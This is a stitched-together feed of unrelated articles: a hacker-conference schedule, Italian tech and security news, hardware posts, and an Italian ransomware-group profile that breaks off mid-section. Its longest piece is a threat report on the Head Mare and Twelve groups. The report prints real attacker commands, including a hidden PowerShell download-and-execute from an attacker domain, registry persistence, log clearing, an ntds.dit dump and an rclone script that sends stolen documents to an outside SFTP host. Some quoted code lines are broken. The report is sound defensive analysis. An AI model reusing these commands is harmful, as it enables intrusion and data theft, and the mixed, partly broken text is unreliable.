Geppert, Freyermuth, & Nielsen
Make PCBs Bend Over Backwards for You: How to Design Flexible PCBs
17:00 – 17:20
Rehana Al-Soltane
More Than Motors: Decoding the Software Behind Pen Plotters and CNC Devices
17:30 – 18:10
Francis Stokes
Half-size Hacking – 0.05in Matrix Boards Under the Microscope
18:20 – 18:40
Alun Morris
Dinner
18:40 – 20:00
HEU1993 to WHY2025: Dutch Hacker Camps from the Past and the Future
20:00 – 20:40
Christel Sanders
Vectors, Pixels, Plotters and Public Participation
20:50 – 21:30
Niklas Roy
Live Performance
21:30 – 22:00
Rich Hogben & Aleksandar Bradic
Badge Hacking Ceremony
22:00 – 24:00
Time Has Run Out!
Tickets sold out a few days ago, so if you’ve got one we’ll see you soon, and if not, we will be streaming all of the Saturday talks live, so hit up Hackaday on the weekend and you can play along, at least virtually. And for back-channel chat, join us on the Hackaday Discord #europe-2025 channel.
100 giorni con un Cuore Meccanico! il futuro dei trapianti è già qui?
L’azienda australiana BiVACOR ha raggiunto un traguardo importante nei suoi sviluppi: un paziente ha vissuto per più di 100 giorni con il cuore meccanico da loro creato, dopodiché è stato sottoposto con successo a un trapianto di organi da donatore. Il nome dell’uomo, che necessitava di un trapianto a causa di una grave malattia, non è stato reso noto.
Il sistema sviluppato, denominato Total Artificial Heart (TAH), è un meccanismo innovativo di circolazione sanguigna. Il progetto si basa su una pompa elettromeccanica con una sola parte mobile, un rotore, che viene mantenuto nella posizione desiderata mediante levitazione magnetica. Il vantaggio principale del dispositivo è la sua capacità di dirigere simultaneamente il flusso sanguigno sia al corpo sia ai polmoni.
Gli ingegneri hanno cambiato radicalmente l’approccio tradizionale alla risoluzione del problema. I modelli precedenti contenevano molte parti mobili che si usuravano gradualmente entrando in contatto tra loro. Nel nuovo modello, il rotore, che ricorda nella sua forma una speciale girante, letteralmente si libra nell’aria senza toccare altre parti.
L’azienda ha addirittura presentato un modello animato in 3D del meccanismo, dimostrando chiaramente il principio del suo funzionamento. Puoi guardarlo Qui .
Il funzionamento dell’impianto è garantito da un sistema di alimentazione esterno. Il controller e le batterie sono collegati al dispositivo tramite un cavo transcutaneo, uno speciale filo che passa attraverso una piccola incisione nel corpo del paziente.
L’anno scorso, BiVACOR ha condotto il suo primo studio negli Stati Uniti, su cinque pazienti sottoposti a TAH come misura temporanea in attesa di un donatore di cuore. Tutti i partecipanti all’esperimento sono stati sottoposti con successo all’intervento chirurgico e sono stati dimessi dall’ospedale dopo qualche tempo. Di due di loro si conosce il destino: uno ha ricevuto il cuore di un donatore 27 giorni dopo l’installazione del TAH, l’altro otto giorni dopo.
L’operazione sul paziente australiano è durata sei ore. Dopo la guarigione, i medici hanno permesso all’uomo di lasciare la clinica. Per più di tre mesi ha condotto una vita normale con l’impianto, finché non si è presentata l’opportunità di sottoporsi a un trapianto.
Il problema delle malattie cardiache resta estremamente acuto e il numero di organi donati disponibili per il trapianto è catastroficamente esiguo. Gli specialisti del BiVACOR intendono potenziare la loro invenzione in modo che possa funzionare fino a dieci anni, più o meno lo stesso periodo di un vero cuore trapiantato.
Tuttavia, i medici avvertono che, nonostante i risultati incoraggianti, lo sviluppo è ancora nella fase di sperimentazione clinica. Negli Stati Uniti sono state approvate solo altre 15 procedure TAH. Ci vorranno anni di ricerca prima che la tecnologia venga approvata per un uso diffuso, sia come supporto temporaneo per i pazienti in lista d’attesa, sia come misura permanente.
L'articolo 100 giorni con un Cuore Meccanico! il futuro dei trapianti è già qui? proviene da il blog della sicurezza informatica.
High-Speed Reservoir Computing With Integrated Laser Graded Artificial Neurons
So-called neuromorphic computing involves the use of physical artificial neurons to do computing in a way that is inspired by the human brain. With photonic neuromorphic computing these artificial neurons generally use laser sources and structures such as micro-ring resonators and resonant tunneling diodes to inject photons and modulate them akin to biological neurons.
One limitation of photonic artificial neurons was that these have a binary response and a refractory period, making them unlike the more versatile graded neurons. This has now been addressed by [Yikun Nie] et al. with their research published in Optica.
The main advantage of graded neurons is that they are capable of analog graded responses, combined with no refractory period in which the neuron is unresponsive. For the photonic version, a quantum dot (QD) based gain section was constructed, with the input pulses determining the (analog) output.
Multiple of these neurons were then combined on a single die, for use in a reservoir computing configuration. This was used with a range of tests, including arrhythmia detection (98% accuracy) and handwriting classification (92% accuracy). By having the lasers integrated and the input pulses being electrical in nature, this should make it quite low-power, as well as fast, featuring 100 GHz QD lasers.
Head Mare and Twelve join forces to attack Russian entities
Introduction
In September 2024, a series of attacks targeted Russian companies, revealing indicators of compromise and tactics associated with two hacktivist groups: Head Mare and Twelve. Our investigation showed that Head Mare relied heavily on tools previously associated with Twelve. Additionally, Head Mare attacks utilized command-and-control (C2) servers exclusively linked to Twelve prior to these incidents. This suggests potential collaboration and joint campaigns between the two groups.
The attackers continue to refine their methods, employing both familiar tools from past Head Mare incidents and new PowerShell-based tools.
This report analyzes the software and techniques observed in recent Head Mare attacks and how these overlap with Twelve’s activities. The focus is on Head Mare’s TTPs and their evolution, with notes on commonalities with Twelve’s TTPs.
Technical details
Head Mare’s toolkit
The attackers used various publicly available tools, including open-source software and leaked proprietary tools, to achieve their goals.
- mimikatz;
- ADRecon;
- secretsdump;
- ProcDump;
- Localtonet;
- revsocks;
- ngrok;
- cloudflared;
- Gost;
- fscan;
- SoftPerfect Network Scanner;
- mRemoteNG;
- PSExec;
- smbexec;
- wmiexec;
- LockBit 3.0;
- Babuk.
Some of these tools were mentioned in our previous report on Head Mare, while others were new to their arsenal.
Notable new tools
Among the tools used by Head Mare were some not previously employed by the hacktivists but seen in attacks by other groups. For instance, they used the CobInt backdoor for remote access to domain controllers, previously observed only in Twelve’s attacks on Russian companies. This is an interesting fact, suggesting that Twelve and Head Mare may be sharing tools.
In addition to CobInt, the attackers used their own PhantomJitter backdoor, installed on servers for remote command execution. This tool appeared in the group’s arsenal in August 2024. We described its modus operandi in a story accessible to the subscribers of our Threat Intelligence reports.
Another new tactic involved a tool for remote command execution on a business automation platform server. Thus, the attackers used both proven and new tools, demonstrating flexibility and adaptability.
Initial Access
While previous Head Mare attacks relied solely on phishing emails with malicious attachments, they now also infiltrate victims’ infrastructure through compromised contractors with access to business automation platforms and RDP connections. This confirms the trend of hacktivists exploiting trusted relationships (T1199 – Trusted Relationship and T1078 – Valid Accounts).
The attackers also exploited software vulnerabilities, most commonly CVE-2023-38831 in WinRAR through phishing emails. In one incident, they exploited the Microsoft Exchange server vulnerability CVE-2021-26855 (ProxyLogon). Although patched in 2021, this vulnerability is still exploitable due to organizations using outdated operating systems and software. Our telemetry data revealed domain controllers still running Microsoft Windows Server 2012 R2 Server Standard x64 or, as in the aforementioned incidents, Microsoft Exchange Server 2016 used for email.
The attackers used ProxyLogon to execute a command to download and launch CobInt on the server.
Persistence
The method of establishing persistence has changed. Instead of creating scheduled tasks, the attackers now create new privileged local users on a business automation platform server. They use these accounts to connect to the server via RDP to transfer and execute tools interactively.
They also install traffic tunneling tools like Localtonet for persistent access to the target host. They made Localtonet persistent with the help of Non-Sucking Service Manager (NSSM), which allows running any application as a Windows service, as well as monitoring and restarting it if it fails for some reason. This user-friendly tool is often used legitimately to install and manage programs that cannot function as services. Localtonet and NSSM help the malicious actor to maintain continuous access to the infected host.
Anti-detection techniques
Head Mare continued to use the Masquerading technique (T1655), naming utility executables like standard operating system files. The investigation found files such as:
| Software | Path in the system |
| Cloud storages sync tool rclone | C:\ProgramData\wusa.exe |
| PhantomJitter | C:\Windows\System32\inetsrv\calc.exe |
| cloudflared | C:\Windows\System32\winuac.exe |
| Gost | C:\Windows\System32\winsw.exe |
In one incident, cmd.exe was renamed to log.exe and launched from C:\Users\[username]\log.exe.
Besides renaming files, the attackers also removed services and files they had created and cleared event logs to evade detection. Relevant artifacts were found in the PowerShell command history on attacked machines:
stop-service -name <servicename>
remove-service -name <servicename>
remove-service -name "<servicename>"
sc stop <servicename>
sc delete <servicename>
Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }
The ransomware executable also cleared system logs, as evidenced by a flag in the configuration of the samples that we have analyzed.
Command and Control
After exploiting the business automation platform server, attackers downloaded and installed the PhantomJitter backdoor. In the incidents we observed, the backdoor was downloaded into the victims’ infrastructure from the following URLs:
http[:]//45.87.246[.]34:443/calc.exe
http[:]//185.158.248[.]107:443/calc.exe
The file was saved in the local directory as c.exe. Upon launch, it connected to the C2 server, allowing the operator to execute commands on the compromised host.
In addition to PhantomJitter, the attackers used CobInt, whose payload connected to the following C2 server:
360nvidia[.]com
The domain resolves to the IP address 45.156.27[.]115.
Pivoting
The group expanded its arsenal to achieve their objectives at this stage. To gain remote access to the compromised infrastructure, they used a custom PowerShell script named proxy.ps1 to install and configure cloudflared and Gost.
Gost is a lightweight, powerful proxy utility offering various network routing and traffic hiding capabilities. It supports multiple protocols and can create secure communication channels, bypass blocks, and establish tunnels.
Cloudflared tunnels traffic through the Cloudflare network. It establishes a secure connection to an attacker-controlled Cloudflare server, acting as a proxy for C2 communication. This bypasses network restrictions like NAT (Network Address Translation) and firewall rules that might hinder direct connections between the victim host and attacker servers.
The proxy.ps1 script can also download archives from URLs specified on a command line and extract them to a temporary folder. Below is the help output for the script:
Usage: .\proxy.ps1 -r https://<site>.com/archive.zip -p gost_port -t cloudflared_token
Parameters:
-l Extract archive locally.
-r Download and extract archive remotely.
-p Specify the port for the gost.
-t Specify the token for the cloudflared.
-u Uninstall gost & cloudflared.
-h Show this help message.
The script defines constants for filenames, installing cloudflared and Gost with names mimicking standard Windows services in the C:\Windows\System32 folder. The script uses the GetTempFileName function to obtain temporary file paths.
$archivePath = "win.zip"
$filesPath = "C:\Windows\System32"
$cloudflaredPath = Join-Path -Path $filesPath -ChildPath "winuac.exe"
$gostPath = Join-Path -Path $filesPath -ChildPath "winsw.exe"
$winswPath = Join-Path -Path $filesPath -ChildPath "winsws.exe"
$winswxmlPath = Join-Path -Path $filesPath -ChildPath "winsws.xml"
$tempFile = [System.IO.Path]::GetTempFileName()
If the -p flag is specified in the command line, a service for the Gost tool will be installed on the system. The following function is used for this:
function Setup-Gost-Service {
# Set port
[xml]$winswxml = Get-Content $winswxmlPath
$winswxml.service.arguments = $winswxml.service.arguments -replace '42716', $p
$winswxml.Save($winswxmlPath)
Write-Host "
# Service install
Write-Host "
Start-Process $winswPath -ArgumentList "install" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
Start-Process $winswPath -ArgumentList "start" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
}
In this code snippet, the script installs the Gost executable file as a service and passes necessary settings to it.
If -t key is passed to the script, it installs and configures cloudflared in the system.
function Setup-Cloudflared-Service {
# Service install
Write-Host "
Start-Process $cloudflaredPath -ArgumentList "service install $t" -RedirectStandardError $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
}
In this code snippet, the script installs the cloudflared service and passes settings to it by means of the command line.
In addition to installing and configuring tunneling tools, the script has the ability to remove the artifacts they leave behind. The script can also stop and uninstall the cloudflared and Gost services, if the -u parameter is passed to it when it launches.
if ($u) {
Write-Host "
Start-Process sc.exe -ArgumentList "stop winsw" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
Start-Process $winswPath -ArgumentList "uninstall" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
Write-Host "
Uninstalling cloudflared"Start-Process sc.exe -ArgumentList "stop winuac" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
Start-Process $cloudflaredPath -ArgumentList "service uninstall" -RedirectStandardError $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
$filePaths = @(
"C:\Windows\System32\winsws.wrapper.log",
"C:\Windows\System32\winsws.err.log",
"C:\Windows\System32\winsws.out.log",
"C:\Windows\System32\winsws.xml",
"C:\Windows\System32\winsws.exe",
"C:\Windows\System32\winsw.exe",
"C:\Windows\System32\winuac.exe"
)
foreach ($filePath in $filePaths) {
if (Test-Path $filePath) {
Remove-Item -Path $filePath -Force
Write-Output "
} else {
Write-Output " File not found: $filePath"
}
}
}
After deleting the services, the script deletes executables, configuration files, and logs of the tools.
In one incident, the attackers downloaded cloudflared and Gost from the server 45[.]156[.]21[.]148, which we previously saw in Head Mare attacks. An example download link is:
hxxp://45[.]156[.]21[.]148:8443/winuac.exe
Besides cloudflared and Gost, the attackers used cloud tunnels like ngrok and Localtonet. Localtonet is a reverse proxy server providing internet access to local services. The attackers launched it as a service using NSSM, downloading both tools from the official Localtonet website (localtonet[.]com).
hxxp://localtonet[.]com/nssm-2.24.zip
hxxp://localtonet[.]com/download/localtonet-win-64.zip
After downloading, they extracted the tools and launched them with these parameters:
nssm.exe install Win32_Serv
localtonet.exe authtoken <token>
These commands allow installing Localtonet as a service and authorizing it with a token for configuration.
Reconnaissance
The attackers used common system reconnaissance tools like quser.exe, tasklist.exe, and netstat.exe on local hosts. They primarily used fscan and SoftPerfect Network Scanner for local network reconnaissance, along with ADRecon, a tool for gathering information from Active Directory. ADRecon is a PowerShell script not previously observed in the group’s arsenal.
The attackers also used ADRecon to study the Active Directory domain, including computers, accounts, groups, and trust relationships between domains. The command history showed various domains passed as arguments to the script:
.\ADRecon.ps1 -DomainController <FQDN A>
.\ADRecon.ps1 -DomainController <FQDN B>
.\ADRecon.ps1 -DomainController <FQDN C>
<..>
Privilege Escalation
The attackers exploited previously compromised accounts of victims and their contractors, and created privileged local accounts, particularly when exploiting the business automation software server. If a user has sufficient permissions to remotely execute commands on the server, this software allows running a child command prompt process, such as cmd.exe, with privileges in the operating system corresponding to the program’s privileges. Since business automation software typically has administrator privileges in the OS, the child process also becomes privileged. The attackers exploited this opportunity: after gaining access to the vulnerable software server, they created a privileged local account on whose behalf they launched a command interpreter.
Command Execution
The attackers launched the Windows command interpreter on the business automation platform server in the target system within a process that executed the following command line:
cmd /c powershell.exe -ep bypass -w hidden -c iex ((New-Object
Net.WebClient).DownloadString('http://web-telegram[.]uk/vivo.txt')) > $temp\v8_B5B0_11.txt
This command downloads and executes the vivo.txt file, which we were unable to obtain. However, based on system events, we suspect that it opened a reverse shell, which the operator used to create two files in the target system.
c:\programdata\microsoftdrive\mcdrive.vbs
c:\programdata\microsoftdrive\mcdrive.ps1
Then, using reg.exe, the attackers added an autorun entry to execute mcdrive.vbs with the interpreter wscript.exe.
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v "mcdrivesvc" /t
REG_EXPAND_SZ /d "wscript.exe \"$appdata\MicrosoftDrive\mcdrive.vbs
The VBS file is an obfuscated Visual Basic script that creates an ActiveX object reference named WScript.Shell and uses its Run() function to execute an obfuscated command line.
A deobfuscated command line snippet follows:
%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -ex bypass -NoLogo -
NonInteractive -NoProfile -w hidden -c iex
([System.IO.File]::ReadAllText('C:\ProgramData\MicrosoftDrive\mcdrive.ps1'))
This command reads and executes the C:\ProgramData\MicrosoftDrive\mcdrive.ps1 file through the PowerShell interpreter. This file is a CobInt loader, previously seen only in Twelve’s arsenal. The mcdrive.ps1 snippet below determines the operating system’s bitness, decrypts, and executes the payload, which initiates a request to a C2 server at 360nvidia[.]com. The image below shows a graph obtained from analysis in the Cloud Sandbox on our Threat Intelligence Portal.
Payload execution analysis graph. The IP address shown on the graph corresponds to the domain 360nvidia.com
Credential Access
The investigation identified tools for obtaining credentials. Besides the publicly available mimikatz utility, the attackers used secretsdump and ProcDump. Secretsdump was found on one victim’s system at the following paths:
[USERNAME]\Desktop\secretsdump.exe
[USERNAME]\Desktop\secretsdump (1).exe
A new Go-based sample named update.exe was also discovered, enabling the dumping of the ntds.dit file and the SYSTEM/SECURITY registry hive using ntdsutil.exe.
powershell ntdsutil.exe "'ac i ntds'" 'ifm' "'create full temp'" q q
Additionally, manual PowerShell commands were observed for dumping data from these locations.
ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp1' q q
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
While no traces of the first command’s successful execution were found, the results of the second one were located at the following paths:
\temp\Active Directory
\temp\registry
\temp\Active Directory\ntds.dit
\temp\Active Directory\ntds.jfm
\temp\registry\SECURITY
\temp\registry\SYSTEM
\temp\[REDACTED].zip
Lateral Movement
The attackers used RDP to connect to systems, including with privileged accounts. They connected to NAS servers via SSH and used tools like mRemoteNG, smbexec, wmiexec, PAExec, and PsExec for remote host communication.
Data Collection and Exfiltration
Another new tool in Head Mare’s arsenal was a script running wusa.exe. Normally, this file name is used by the legitimate Windows update process. However, the script’s launch parameters indicated that the file was actually the rclone.exe utility. Rclone is an open-source project for copying and synchronizing files between storages of different types, making it convenient for data transfer.
@echo off
setlocal enabledelayedexpansion
set inputFile=C:\ProgramData\1.txt
for /f "tokens=*" %%A in (%inputFile%) do (
set hostname=%%A
start /wait "" C:\ProgramData\wusa.exe --config="C:\ProgramData\1.conf" --sftp-socks-proxy <username>:<password>@64.7.198.109:80 sync "\\%%A\C$\Users" sftpP:/data/<path> -q --ignore-existing --auto-confirm --include "*.doc" --include "*.docx" --include "*Desktop/**" --include "*Documents/**" --include "*Downloads/**" --include "*.pdf" --include "*.xls" --include "*.xlsx" --include "*.zip" --include "*.rar" --include "*.txt" --include "*.pn*" --include "*.ppt" --include "*.pptx" --include "*.jp*" --include "*.eml" --include "*.pst" --multi-thread-streams 12 --transfers 12 --max-age 3y --max-size 1G
)
endlocal
The script starts by taking the file 1.txt as input, which contains a list of hosts. For each host, it runs rclone.exe to transfer files from the device to an SFTP server through a SOCKS proxy. The attackers only exfiltrated files from specific directories or files matching the extension templates specified in the script.
Final goal: file encryption
As in previous attacks, they encrypted data using variants of LockBit 3.0 (for Windows systems) and Babuk (for NAS devices). The investigation found that the LockBit file was initially saved on the victim’s host at the following paths:
- C:\Users\{username}\Desktop\locker.exe;
- С:\Windows\SYSVOL\Intel\locker.exe.
Below is a sample ransom note, with the cybercriminals’ contacts redacted:
Contents of a LockBit ransom note
Connection between Head Mare and Twelve
In addition to the aforementioned TTPs, we attribute these attacks to Head Mare based on the following characteristics:
- A previously seen IP address:
- 45.156.21[.]148
- Malware:
- PhantomJitter
Further details about these indicators can be found in the private report on the Threat Intelligence Portal: “HeadMare’s new PhantomJitter backdoor dropped in attacks exploiting Microsoft Exchange”.
However, the presence of Twelve’s tools like CobInt suggests collaboration. To test this hypothesis, activity cluster diagrams were created based on the Diamond Model framework. Overlaps – common elements in the tactics of both groups – are highlighted in red, indicating potential coordination.
Analysis of the Head Mare techniques and tools
In the image above, we see for the first time the use of the CobInt malware in Head Mare attacks. Previously, it was present only in the arsenal of the Twelve group, the analysis of which is presented below.
Analysis of the Twelve techniques and tools
Also, the analysis of the two models revealed overlaps in the infrastructure (C2s) of the groups. The following infrastructure elements appearing in Head Mare attacks were also present in a number of incidents related to the activities of the Twelve group.
- 360nvidia[.]com;
- 45.156.27[.]115
In addition, we have identified other similarities in the arsenal of the two groups:
- File names:
- proxy.ps1
- ad_without_dc.ps1
- Paths:
- C:\Windows\System32\winsw.exe
- C:\Windows\System32\winsws.exe
- C:\Windows\System32\winuac.exe
- Service names:
- winsw (Microsoft Windows Update)
- winuac (Microsoft UAC Service Wrapper)
- Victims:
- Manufacture, government, energy
The final intersection points of the Head Mare and Twelve groups are shown in the image below. Given the overlaps in infrastructure, TTPs, CobInt malware, and victim choices, we assume that these groups act together, exchanging access to command-and-control servers and various tools for carrying out attacks.
Overlaps in TTPs, tools, and infrastructure between Head Mare and Twelve
Conclusion
Head Mare is actively expanding its set of techniques and tools. In recent attacks, they gained initial access to the target infrastructure by not only using phishing emails with exploits but also by compromising contractors.
They also use tools previously seen in attacks by other groups, such as Twelve’s CobInt backdoor.
This is not the only similarity between the two groups. In addition to the toolkit, the following were noticed:
- Shared command-and-control servers: 360nvidia[.]com, 45.156.27[.]115
- PowerShell scripts accessing these C2 servers: mcdrive.ps1
- Scripts for tunneling network connections: proxy.ps1
Based on the factors described above, we assume that Head Mare is working with Twelve to launch attacks on state- and privately controlled companies in Russia. We will continue to monitor the activity of the attackers and share up-to-date information about their TTPs. More details about the hacktivists’ activities and their tools, such as PhantomJitter, can be found in the materials available to subscribers of our Threat Intelligence reports.
Indicators of compromise
Please note: the network addresses given in this section were valid at the time of publication but may become outdated in the future.
Hashes:
| 6008E6C3DEAA08FB420D5EFD469590C6 | ADRecon.ps1 |
| 09BCFE1CCF2E199A92281AADE0F01CAF | calc.exe, c.exe |
| 70C964B9AEAC25BC97055030A1CFB58A | locker.exe |
| 87EECDCF34466A5945B475342ED6BCF2 | mcdrive.vbs |
| E930B05EFE23891D19BC354A4209BE3E | mimikatz.exe |
| C21C5DD2C7FF2E4BADBED32D35C891E6 | proxy.ps1 |
| 96EC8798BBA011D5BE952E0E6398795D | secretsdump.exe, secretsdump (1).exe |
| D6B07E541563354DF9E57FC78014A1DC | update.exe |
File paths:
С:\Windows\SYSVOL\Intel\locker.exe
C:\ProgramData\MicrosoftDrive\mcdrive.ps1
C:\ProgramData\MicrosoftDrive\mcdrive.vbs
C:\ProgramData\proxy.ps1
C:\ProgramData\wusa.exe
C:\Users\{USERNAME}\AppData\Roaming\1.bat
C:\Users\{USERNAME}\AppData\Roaming\Microsoft\Windows\Recent\mimikatz.lnk
C:\Users\{USERNAME}\AppData\Roaming\proxy.ps1
C:\Users\{USERNAME}\Desktop\Обработка.epf
C:\Users\{USERNAME}\Desktop\ad_without_dc.ps1
C:\Users\{USERNAME}\Desktop\ADRecon.ps1
C:\Users\{USERNAME}\Desktop\h.txt
C:\Users\{USERNAME}\Desktop\locker.exe
C:\Users\{USERNAME}\Desktop\mimikatz.exe
C:\Users\{USERNAME}\Desktop\mimikatz.log
C:\Users\{USERNAME}\Desktop\secretsdump (1).exe
C:\Users\{USERNAME}\Desktop\secretsdump.exe
C:\Users\{USERNAME}\Downloads\mimikatz-master.zip
C:\users\{USERNAME}\log.exe
C:\windows\adfs\ar\update.exe
C:\windows\system32\inetsrv\c.exe
C:\windows\system32\inetsrv\calc.exe
C:\windows\system32\winsw.exe
C:\Windows\System32\winsws.exe
C:\windows\system32\winuac.exe
C:\Windows\SYSVOL\Intel\mimikatz.exe
IP addresses and domain names:
360nvidia[.]com
web-telegram[.]uk
45.156.27[.]115
45.156.21[.]148
185.229.9[.]27
45.87.246[.]34
185.158.248[.]107
64.7.198[.]109
Ragazzi, Pronti per i Workshop della RHC Conference? Scopriamo assieme Deepfake, AI, Darkweb, Ethical Hacking, Doxing e Cyberbullismo
Giovedì 8 maggio, la Red Hot Cyber Conference 2025 ospiterà un’intera giornata dedicata ai ragazzi con i Workshop Hands-on (organizzati in collaborazione con Accenture Italia). Si tratta di un’opportunità unica e gratuita per immergersi nel mondo della cybersecurity e della tecnologia in modo pratico e interattivo. Vista la folla dello scorso anno che ha assalito la conferenza durante i workshop, questo anno i workshop si svolgeranno all’interno del teatro che mette ben 800 posti a disposizione.
L’evento si terrà a Roma, presso il Teatro Italia, con accoglienza a partire dalle 11:00 dando modo alle scolaresche che arrivano da fuori Roma di accedere alla manifestazione nei tempi. Il Teatro Italia dista solo 20 minuti a piedi dalla Stazione Termini e 6 minuti a piedi dalla Metro B di Piazza Bologna (circa 600 metri).
L’inizio dei workshop è fissato alle 11:30. Questa giornata sarà dedicata a tutti i ragazzi delle scuole medie, superiori ed università o banalmente dei curiosi che si vorranno immergere nella tecnologia e nella sicurezza informatica in modo pratico, interattivo e coinvolgente.
Registrazione gratuita per i Workshop della giornata di Giovedì 8 Maggio
Come lo faremo
Non solo parole, ma attraverso l’esperienza diretta! Attraverso sessioni tecniche immersive, i ragazzi avranno l’opportunità di sperimentare in prima persona come gli hacker etici testano le vulnerabilità di un sito web, come l’intelligenza artificiale può essere utilizzata per riconoscere oggetti o analizzare deepfake, e come affrontare problemi specifici di cybersecurity. Inoltre, esploreranno il Dark Web in modo sicuro, comprendendo l’importanza dell’Open Source Intelligence (OSINT) e della Cyber Threat Intelligence oltre a parlare di Doxing e Cyberbullismo.
Questa iniziativa avrà la caratteristica “hands on”. In informatica, l’espressione “hands-on” si riferisce a un approccio pratico e concreto all’apprendimento o all’esecuzione di specifici compiti. Significa letteralmente “mani sopra” e implica l’effettiva manipolazione, sperimentazione o applicazione di conoscenze o abilità in un contesto pratico anziché limitarsi a una comprensione teorica o astratta.
Ti invitiamo a portare il tuo portatile con il sistema operativo che preferisci, così potrai partecipare attivamente agli esercizi insieme ai nostri esperti. Se qualche passaggio ti sfuggirà, nessun problema: tutti i workshop saranno registrati e disponibili sul nostro canale YouTube, così potrai rivederli quando vuoi, proprio come negli anni precedenti.
[strong][url=http://rhc-conference-2025-workshop.eventbrite.it/]Registrazione gratuita per i Workshop della giornata di Giovedì 8 Maggio[/url][/strong]
Un’Esperienza Interattiva e Pratica
L’obiettivo non sarà quindi solo “passivo”, ma soprattutto “attivo”, per consentire ai ragazzi di toccare con mano qualcosa che da sempre hanno visto nei film pensando che fosse qualcosa di inarrivabile, attivando nelle loro avide voraci menti un interesse per queste specifiche materie che nessuno gli ha mai fatto provare da vicino.
A differenza delle edizioni precedenti, i workshop saranno concentrati esclusivamente nella giornata dell’8 maggio e offriranno ai partecipanti la possibilità di toccare con mano le tecnologie più innovative, grazie a diverse sessioni pratiche.
Porta il tuo laptop! In alcuni di questi workshop avrai la possibilità di mettere subito mano e provare nella pratica quanto appreso, sotto la guida di esperti del settore.
Programma della Giornata
Di seguito, il programma dettagliato dei workshop che verranno svolti nella giornata di giovedì 8 maggio (che potrete trovare anche nel programma completo della conference):
Perché Partecipare?
- Esperienza pratica: Non solo teoria, ma esercizi concreti per migliorare le tue competenze.
- Esperti del settore: Sessioni guidate da professionisti altamente qualificati.
- Approfondimenti unici: Temi cruciali come ethical hacking, privacy, intelligenza artificiale e cyberbullismo.
- Networking: Un’opportunità per connettersi con altri appassionati di cybersecurity.
Registrazione gratuita per i Workshop della giornata di Giovedì 8 Maggio
Registrati Subito!
L’ingresso ai Workshop Hands-on richiede una registrazione separata rispetto alla conferenza. Prenota il tuo posto qui: rhc-conference-2025-workshop.e…
Non perdere questa occasione per apprendere, sperimentare e metterti alla prova nel mondo della cybersecurity! Ci vediamo giovedì 8 maggio a Roma!
L'articolo Ragazzi, Pronti per i Workshop della RHC Conference? Scopriamo assieme Deepfake, AI, Darkweb, Ethical Hacking, Doxing e Cyberbullismo proviene da il blog della sicurezza informatica.
A Decade Resistance Box From PCBs
One of those useful things to have around on your bench is a decade resistance box, essentially a dial-a-resistance instrument. They used to be quite expensive in line with the cost of close-tolerance resistors, but the prices have come down and it’s within reach to build your own. Electronic design consultancy Dekimo have a nice design for one made from a series of PCBs which they normally give out at trade fairs, but now they’ve released the files for download.
It’s released as Gerbers and BOM with a pick-and-place file only, and there’s no licence so it’s free-as-in-beer, but that should be enough if you fancy a go. Our Gerber viewer is playing up so we’re not entirely sure how reliable using PCBs as wafer switches will be long-term, but since the pictures are all ENIG boards we’d guess the gold plating will be much better than the HASL on all those cheap multimeters.
We like this as a conference giveaway, being used to badges it’s refreshing to see a passive take on a PCB artwork. Meanwhile this isn’t the first resistance box we’ve seen with unconventional switches.
Arriva NightSpire! Un Nuovo Attore nel Panorama del Ransomware
Nelle ricognizioni nel mondo dell’underground e dei gruppi criminali svolte dal laboratorio di intelligence delle minacce DarkLab di Red Hot Cyber, ci siamo imbattuti all’interno di un Data Leak Site di una cyber gang mai monitorata prima: NightSpire.
Si tratta di un nuovo gruppo ransomware che sembra essersi affacciato recentemente sulla scena del cybercrime. Sebbene non si abbiano informazioni pregresse su questo attore, l’analisi del loro data leak site (DLS) e della loro comunicazione fornisce alcuni indizi chiave sulla loro strategia e modalità operative.
Il gruppo si autodefinisce come una minaccia inarrestabile per le aziende e promette di sfruttare ogni vulnerabilità a loro vantaggio. Di seguito, analizziamo i dettagli del loro portale e le possibili implicazioni della loro attività.
NightSpire: Identità e Dichiarazioni Pubbliche
La sezione “About” del sito di NightSpire contiene un messaggio intimidatorio, tipico dei gruppi ransomware che cercano di diffondere il terrore tra le aziende. Il linguaggio utilizzato richiama quello di attori ben noti come BlackCat, LockBit e Conti, sottolineando la loro intenzione di colpire organizzazioni vulnerabili e minacciarle per ottenere un riscatto.
Testo dalla sezione “About”:
“NightSpire, gli architetti ombra del caos digitale, prosperano distruggendo la sacralità delle fortezze aziendali. Con precisione spietata, infiltriamo i più profondi depositi di dati, senza lasciare alcun byte intatto. Temeteci, perché NightSpire è l’araldo della vostra rovina, la mano invisibile che sfrutterà ogni vostra vulnerabilità finché non vi inginocchierete davanti alle nostre richieste.”
Questa retorica è un chiaro segnale di cyber-intimidazione, che mira a rafforzare l’immagine del gruppo come una minaccia inarrestabile e a destabilizzare le vittime.
Analisi del Data Leak Site (DLS)
NightSpire utilizza un data leak site per pubblicare informazioni sulle aziende compromesse, un modus operandi ormai comune nei gruppi ransomware. Il portale presenta una sezione “Databases”, dove vengono elencate le vittime, con dettagli su:
- Data dell’attacco
- Data della pubblicazione del leak
- Dimensione dei dati esfiltrati
- Paese della vittima
Dalle immagini analizzate, si possono notare alcune aziende colpite:
Alcuni di questi leak risultano ancora in conto alla rovescia, suggerendo che il gruppo segue la strategia del double extortion: minaccia di pubblicare i dati rubati se il riscatto non viene pagato. Quando il timer raggiunge lo zero, i dati vengono resi pubblici.
Questa tecnica viene utilizzata per esercitare ulteriore pressione sulle vittime, inducendole a pagare per evitare danni alla reputazione e perdite di dati sensibili.
Struttura di Contatto e Canale Telegram
